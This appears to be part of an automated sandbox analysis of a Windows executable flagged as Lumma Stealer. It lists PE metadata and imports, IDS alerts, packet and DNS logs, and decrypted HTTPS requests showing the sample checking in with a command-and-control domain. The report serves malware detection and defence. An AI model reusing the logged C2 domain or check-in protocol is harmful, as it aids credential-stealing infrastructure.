                                                                            mov esi, eax
                                                                            jmp 00007F7194BE35ADh
                                                                            mov eax, dword ptr [esi]
                                                                            test eax, eax
                                                                            je 00007F7194BE35A4h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [C++] VS2008 build 21022
                                                                            • [ASM] VS2008 build 21022
                                                                            • [ C ] VS2008 build 21022
                                                                            • [IMP] VS2005 build 50727
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 build 21022

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x4231c0x50.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x6fd0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d780x40.text
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x41c520x41e002171c2495fccc8a1991d251fa428b621False0.8846396169354839data7.828452580141766IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .data0x430000xac9c0x6000ca950f2471ca6c99e0633a8c327a5b11False0.080078125data0.9604420585282475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x4e0000xcfd00x70005af8b791ffa8abc2be49af61907190a1False0.47879464285714285data4.780777377767162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_CURSOR0x542800x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                            RT_CURSOR0x545b00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                            RT_ICON0x4e3900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.43363539445628996
                                                                            RT_ICON0x4f2380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.552797833935018
                                                                            RT_ICON0x4fae00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.581221198156682
                                                                            RT_ICON0x501a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6054913294797688
                                                                            RT_ICON0x507100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4447095435684647
                                                                            RT_ICON0x52cb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4922607879924953
                                                                            RT_ICON0x53d600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.5212765957446809
                                                                            RT_STRING0x549280x3ceAmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v"RomanianRomania0.4650924024640657
                                                                            RT_STRING0x54cf80x2d2dataRomanianRomania0.4806094182825485
                                                                            RT_ACCELERATOR0x542300x50dataRomanianRomania0.8125
                                                                            RT_GROUP_CURSOR0x546e00x22data1.0294117647058822
                                                                            RT_GROUP_ICON0x541c80x68dataRomanianRomania0.6826923076923077
                                                                            RT_VERSION0x547080x21cdata0.5166666666666667

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllSetLocaleInfoA, EnumCalendarInfoA, WriteConsoleInputW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, SetComputerNameW, FreeEnvironmentStringsA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommConfig, SwitchToFiber, ReadConsoleInputA, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, SetStdHandle, RaiseException, GetLocaleInfoA, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
                                                                            USER32.dllOemToCharA, DdeQueryStringA, GetWindowTextLengthA
                                                                            SHELL32.dllDragQueryPoint

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            RomanianRomania

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-04T15:31:55.180569+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.4554981.1.1.153UDP
                                                                            2025-01-04T15:31:55.839962+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.449731104.21.96.1443TCP
                                                                            2025-01-04T15:31:55.839962+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.96.1443TCP
                                                                            2025-01-04T15:31:56.313636+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.96.1443TCP
                                                                            2025-01-04T15:31:56.313636+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.96.1443TCP
                                                                            2025-01-04T15:31:56.810219+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.449732104.21.96.1443TCP
                                                                            2025-01-04T15:31:56.810219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.96.1443TCP
                                                                            2025-01-04T15:31:57.341526+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.96.1443TCP
                                                                            2025-01-04T15:31:57.341526+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.96.1443TCP
                                                                            2025-01-04T15:31:58.142436+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.449733104.21.96.1443TCP
                                                                            2025-01-04T15:31:58.142436+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.96.1443TCP
                                                                            2025-01-04T15:31:58.815163+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733104.21.96.1443TCP
                                                                            2025-01-04T15:31:59.355446+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.449734104.21.96.1443TCP
                                                                            2025-01-04T15:31:59.355446+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.96.1443TCP
                                                                            2025-01-04T15:32:01.043748+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.449735104.21.96.1443TCP
                                                                            2025-01-04T15:32:01.043748+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.96.1443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 4, 2025 15:31:55.196605921 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.196636915 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:55.196712971 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.199269056 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.199284077 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:55.839756012 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:55.839962006 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.842062950 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.842072964 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:55.842325926 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:55.889393091 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.889393091 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:55.889489889 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.313641071 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.313716888 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.313899994 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.329380989 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.329402924 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.329421997 CET49731443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.329427958 CET44349731104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.346952915 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.346995115 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.347063065 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.347433090 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.347448111 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.810153961 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.810219049 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.866385937 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.866399050 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.866602898 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:56.879190922 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.879358053 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:56.879380941 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341542006 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341586113 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341619968 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341640949 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.341656923 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341698885 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341701984 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.341711044 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341758013 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341757059 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.341767073 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.341804028 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.341809988 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.342609882 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.342659950 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.342668056 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.346463919 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.346513033 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.346520901 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.395765066 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.429785967 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.429835081 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.429881096 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.429882050 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.429892063 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.429925919 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.429925919 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.429972887 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.430284977 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.430300951 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.430310011 CET49732443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.430315018 CET44349732104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.573072910 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.573110104 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:57.573184967 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.573463917 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:57.573481083 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.142371893 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.142436028 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.143863916 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.143872023 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.144067049 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.145457029 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.145598888 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.145620108 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.145678997 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.145685911 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.815172911 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.815248966 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.815304995 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.815572023 CET49733443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.815587997 CET44349733104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.899379015 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.899410009 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:58.899487019 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.899755955 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:58.899770021 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:59.355365038 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:59.355446100 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:59.460592031 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:59.460622072 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:59.460874081 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:31:59.467216969 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:59.467334986 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:31:59.467367887 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:00.388539076 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:00.388628006 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:00.388680935 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:00.388801098 CET49734443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:00.388819933 CET44349734104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:00.571597099 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:00.571626902 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:00.571708918 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:00.571974993 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:00.571985960 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.043561935 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.043747902 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.044847965 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.044856071 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.045048952 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.046113014 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046248913 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046278000 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.046349049 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046355963 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.682929993 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.683024883 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.683089972 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.683320999 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.683332920 CET44349735104.21.96.1192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 4, 2025 15:31:55.180568933 CET5549853192.168.2.41.1.1.1
                                                                            Jan 4, 2025 15:31:55.191967010 CET53554981.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 4, 2025 15:31:55.180568933 CET192.168.2.41.1.1.10xb57dStandard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                            Jan 4, 2025 15:31:55.191967010 CET1.1.1.1192.168.2.40xb57dNo error (0)cloudewahsj.shop104.21.112.1A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • cloudewahsj.shop

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731104.21.96.14433916C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-04 14:31:55 UTC263OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:31:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2025-01-04 14:31:56 UTC1123INHTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=4u2r8t69dchj2mvgg1k4s19k3p; expires=Wed, 30 Apr 2025 08:18:35 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bn%2B8Taz5fN8QnZVsXMV5SBYPjqKF92KzSXiiMcFk3J6dtxtkDZU1CXuqqqOnHwi3DiF%2B4MZfJqpKW4c4b5cVOXO2OjOkPSU1NXOUeTr3Xf9s0lfDwbbE5GmHhp17oehYWf%2BZ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef5ea8a372a4-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=55585&min_rtt=5895&rtt_var=32137&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=495335&cwnd=212&unsent_bytes=0&cid=69b425d2079a7856&ts=493&x=0"
                                                                            2025-01-04 14:31:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2025-01-04 14:31:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449732104.21.96.14433916C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-04 14:31:56 UTC264OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 74
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:31:56 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                            2025-01-04 14:31:57 UTC1123INHTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=94trhk48e3lpm4k6jam1djp7cc; expires=Wed, 30 Apr 2025 08:18:36 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZUvk%2FjQvPkSd96vdNRj%2F7LQYi2LkWYw3cIbDKI5Kk8yd1TKoXZznvdxzLuV2PidMNTKciSOP6TpSw9C0T8M1DRXQN%2BnLar%2B39NCKFp6xM6HDfTUssSWUqGOPnArfYavCSWj"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef64dd0c42c0-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1710&rtt_var=643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=974&delivery_rate=1698662&cwnd=212&unsent_bytes=0&cid=230c3d3a8aa191c1&ts=536&x=0"
                                                                            2025-01-04 14:31:57 UTC246INData Raw: 63 33 37 0d 0a 74 75 57 53 51 4d 68 7a 4f 64 38 6f 58 30 49 49 4a 4f 63 65 4f 55 63 41 39 47 47 61 72 74 73 39 4e 49 33 6a 55 42 45 36 50 78 72 4e 78 2b 52 69 38 6b 63 56 2f 56 73 36 59 44 4a 51 6c 57 74 63 61 79 4b 56 42 62 69 55 76 56 78 59 2f 6f 5a 38 4d 30 78 53 4f 49 79 44 38 79 79 37 46 68 58 39 54 53 64 67 4d 6e 2b 63 50 46 77 70 49 73 35 44 2f 38 53 35 58 46 6a 76 67 6a 74 2b 53 6c 4e 35 33 6f 6e 31 4b 4b 30 51 58 62 35 45 4d 69 64 74 51 59 5a 30 56 79 35 74 6e 41 79 34 67 76 6c 59 54 71 2f 5a 63 6c 78 66 53 33 76 37 68 4f 45 72 36 67 34 56 70 41 6f 36 4c 43 6f 65 78 58 39 63 4a 57 79 53 42 66 48 47 73 31 56 51 37 6f 63 36 59 56 4e 5a 63 74 36 48 39 69 6d 6e 47 55 6d 7a 54 6a 55 73 61 30 75 47 50 42 56 6c 5a 59 35 44 6f
                                                                            Data Ascii: c37tuWSQMhzOd8oX0IIJOceOUcA9GGarts9NI3jUBE6PxrNx+Ri8kcV/Vs6YDJQlWtcayKVBbiUvVxY/oZ8M0xSOIyD8yy7FhX9TSdgMn+cPFwpIs5D/8S5XFjvgjt+SlN53on1KK0QXb5EMidtQYZ0Vy5tnAy4gvlYTq/ZclxfS3v7hOEr6g4VpAo6LCoexX9cJWySBfHGs1VQ7oc6YVNZct6H9imnGUmzTjUsa0uGPBVlZY5Do
